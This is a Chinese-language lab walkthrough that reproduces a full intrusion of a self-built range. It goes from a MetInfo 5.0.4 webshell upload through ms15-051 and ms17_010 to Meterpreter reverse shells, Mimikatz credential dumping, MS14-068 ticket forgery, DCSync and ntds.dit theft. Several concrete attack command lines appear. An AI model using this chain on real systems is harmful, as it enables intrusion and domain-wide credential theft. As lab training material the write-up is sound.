靶场复现渗透测试流程
外网渗透
使用御剑扫描目录获取到管理员后台登陆界面。
(此处还有收集whois和ip等信息,由于是自己搭建的靶场就不搜集了)
使用nmap只能扫描到80端口开放。
然后登陆后台管理,尝试弱密码登陆,账号admin和密码admin123登陆成功。
登陆页面之后发现页面有上传文件,尝试直接上传一句话木马php,文件报错,而且有流量经过,说明不是js前端验证。然后尝试修改上传格式,添加了php格式,上传还是不成功。(后来发现是将已有的格式全部删除,即可上传php文件)
然后在到前台界面尝试sql注入,由于页面没有sql语句报错,尝试了布尔值注入,只能拿到数据库名字metinfo。
接下来无法进行下一步,然后再回去查看metinfo的版本,百度查看了该系统版本5.0.4存在的漏洞,找到了文件上传的方法,编写了一个html文件,成功上传一句话木马。
而且在页面执行成功,然后上菜刀,打开了该电脑,尝试上传QuarksPwDump.exe软件到windows\temp目录下,虚拟终端执行了成功获取到hash值,然后cmd5在线翻译了得到密码123.com,在使用ms15-051.exe成功提权。
此处使用的MetInfo版本是5.0.4,漏洞复现详情请观看
使用代理拿下win7
由于win3的是phpstudy,所以将tunnel.nosocket.php文件放到www目录下,然后远程打开,确定能打开之后。
然后使用kali的python环境将代理挂上。
然后使用proxychains nmap扫描对应的端口445是否开放。
然后将使用proxychains msfconsole创建木马连接win7,使用ms17_010连接上win7获取meterpreter,然后执行shell。
发现反弹不了cmd.exe,然后使用msfvenom另外生成一个lida.exe木马,使用meterpreter上传到目标服务器,然后使用在另外开一个msfconsole,使用exploit/multi/hander,设置端口,exploit挂上代理,然后原来的meterpreter使用execute -f lida.exe执行木马即可反弹代理,然后第二个meterpreter即可生成,使用shell成功执行。
原来的meterpreter可以先不用关掉,可以用来上传文件,先是上传mimikatz.exe、mimidrv.sys和mimilib.dll,然后第二个meterpreter获得的shell(系统权限)执行它,然而并没有获取到本机的hash值,我上传Invoke-Mimikatz.ps1,然后在第二个meterpreter返回的shell输入powershell -exec bypass “import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz” 返回了hash值。
在第二关meterpreter输入ps查看进程,知道了hacker的test进程之后,使用migrate+pid(test的任意一个)。
然后getuid查看了解到了身份就变成test身份了,然后whami /all查看test的sid。
然后使用net view查看了域管的计算机名,再使用14068py.exe -u [email protected] -p “123.com” -s SID号 -d 域控计算机名.hacker.com获取[email protected],然后klist purge清除票据,然后就可以dir \域管计算机名\c$连接上域管了,这里我连获取域hash值一块做了,再输入mimikatz.exe,输入lsadump::dcsync /domain:hacker.com /user:administrator /csv获取域hash值。
关掉第一个meterpreter,第二个shell退出到meterpreter,然后background挂起到后台上,然后route add 10.0.0.0 255.0.0.0 1,然后use auxiliary/server/socks4a,exploit一下,然后netstat -anpt发现本地端口1080开放了,然后修改/etc/proxychains.conf文件最后一行未ssocks4 127.0.0.1 1080,然后就可以使用代理hydra弱口令**sever域管了。
使用sessions -I 1回到了meterpreter,shell进入cmd,使用chcp 65001可以更改编码格式,然后分别使用了at、schtasks和psexec进行计划任务执行,使用at \目标机的ip 时间 command。使用schtasks /run /tn 计划任务名称 /s 目标机ip /u 用户 /p 密码,可以立即执行计划任务,不用等到设定的时间,schtasks /F /delete /tn 计划任务名 /s 目标机ip /u 用户 /p 密码,可以将计划任务删除。
上传写好的1.bat文件和vssown.vbs文件到win7,使用net use远程连接上server,然后dir一下看是否成功,然后在copy复制到server,然后再使用计划任务at执行一下,执行成功后,查看了server多了个1.txt文件,打开看到了磁盘快照名,然后写入第二个bat文件,继续上传到win7,再上传到server,再at远程计划执行,再次查看发现server多了ntds.dit和system文件,然后先是copy到win7,然后在从win7下载到kali,然后使用kali解码。